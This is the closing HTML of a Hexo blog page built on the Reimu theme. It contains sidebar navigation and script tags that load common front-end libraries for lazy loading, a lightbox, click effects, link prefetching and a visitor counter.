  <div class="sidebar-state-tag">
    <div>Tags</div>
    <div class="sidebar-state-number">11</div>
  </div>
</div>
<div class="sidebar-social">
  
</div>
<div class="sidebar-menu">
  
    <div class="sidebar-menu-link-wrap">
      <a class="sidebar-menu-link-dummy" href="/" aria-label="Home"></a>
      <div class="sidebar-menu-icon icon-taichi"></div>
      <div class="sidebar-menu-link">Home</div>
    </div>
  
    <div class="sidebar-menu-link-wrap">
      <a class="sidebar-menu-link-dummy" href="/archives" aria-label="Archives"></a>
      <div class="sidebar-menu-icon icon-taichi"></div>
      <div class="sidebar-menu-link">Archives</div>
    </div>
  
    <div class="sidebar-menu-link-wrap">
      <a class="sidebar-menu-link-dummy" href="/about" aria-label="About"></a>
      <div class="sidebar-menu-icon icon-taichi"></div>
      <div class="sidebar-menu-link">About</div>
    </div>
  
    <div class="sidebar-menu-link-wrap">
      <a class="sidebar-menu-link-dummy" href="/friend" aria-label="Friend"></a>
      <div class="sidebar-menu-icon icon-taichi"></div>
      <div class="sidebar-menu-link">Friend</div>
    </div>
  
</div>
</div>
    
  </div>
  
    <div class="sidebar-btn-wrapper">
      <div class="sidebar-toc-btn current"></div>
      <div class="sidebar-common-btn"></div>
    </div>
  
</nav>

    </div>
    
    
<script src="https://npm.webcache.cn/lazysizes@5.3.2/lazysizes.min.js"></script>


<script src="https://npm.webcache.cn/clipboard@2.0.11/dist/clipboard.min.js"></script>



<script src="/js/script.js"></script>



  
<script src="/js/aos.js"></script>

  <script>
    var aosInit = () => {
      AOS.init({
        duration: 1000,
        easing: "ease",
        once: true,
        offset: 50,
      });
    };
    if (document.readyState === 'loading') {
      document.addEventListener('DOMContentLoaded', aosInit);
    } else {
      aosInit();
    }
  </script>



<script src="/js/pjax_script.js" data-pjax></script>


<script type="module" data-pjax>
  import PhotoSwipeLightbox from "https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe-lightbox.esm.min.js";
  
  const pswp = () => {
    if (_$$('.article-entry a.article-gallery-item').length > 0) {
      new PhotoSwipeLightbox({
        gallery: '.article-entry',
        children: 'a.article-gallery-item',
        pswpModule: () => import("https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe.esm.min.js")
      }).init();
    }
    if(_$$('.article-gallery a.article-gallery-item').length > 0) {
      new PhotoSwipeLightbox({
        gallery: '.article-gallery',
        children: 'a.article-gallery-item',
        pswpModule: () => import("https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe.esm.min.js")
      }).init();
    }
    window.lightboxStatus = 'done';
    window.removeEventListener('lightbox:ready', pswp);
  }
  if(window.lightboxStatus === 'ready') {
    pswp()
  } else {
    window.addEventListener('lightbox:ready', pswp);
  }
</script>
















  
<script src="https://npm.webcache.cn/mouse-firework@0.0.4/dist/index.umd.js"></script>

  <script>
    window.firework && window.firework(JSON.parse('{"excludeElements":["a","button"],"particles":[{"shape":"circle","move":["emit"],"easing":"easeOutExpo","colors":["#ff5252","#ff7c7c","#ffafaf","#ffd0d0"],"number":20,"duration":[1200,1800],"shapeOptions":{"radius":[16,32],"alpha":[0.3,0.5]}},{"shape":"circle","move":["diffuse"],"easing":"easeOutExpo","colors":["#ff0000"],"number":1,"duration":[1200,1800],"shapeOptions":{"radius":20,"alpha":[0.2,0.5],"lineWidth":6}}]}'))
  </script>







  
<script src="https://npm.webcache.cn/quicklink@2.3.0/dist/quicklink.umd.js"></script>

  <script data-pjax>
    window.quicklink?.listen({
      timeout: 3000,
      priority: true,
      ignores: []
    });
  </script>


<div id="lazy-script">
  <div>
    
  </div>
</div>


  <script>
    console.log(String.raw`%c 
 ______     ______     __     __    __     __  __    
/\  == \   /\  ___\   /\ \   /\ "-./  \   /\ \/\ \   
\ \  __<   \ \  __\   \ \ \  \ \ \-./\ \  \ \ \_\ \  
 \ \_\ \_\  \ \_____\  \ \_\  \ \_\ \ \_\  \ \_____\ 
  \/_/ /_/   \/_____/   \/_/   \/_/  \/_/   \/_____/ 
                                                  
`,'color: #ff5252;')
    console.log('%c Theme.Reimu v' + '0.3.3' + ' %c https://github.com/D-Sketon/hexo-theme-reimu ', 'color: white; background: #ff5252; padding:5px 0;', 'padding:4px;border:1px solid #ff5252;')
  </script>
  



  
<script src="https://npm.webcache.cn/busuanzi@2.3.0/bsz.pure.mini.js" async></script>




<script>
  if ('serviceWorker' in navigator) {
    navigator.serviceWorker.getRegistrations().then((registrations) => {
      for (let registration of registrations) {
        registration.unregister();
      }
    });
  }
</script>

  <!-- hexo injector body_end start -->
<script src="/js/insert_highlight.js" data-pjax></script>
<!-- hexo injector body_end end --></body>
  </html>

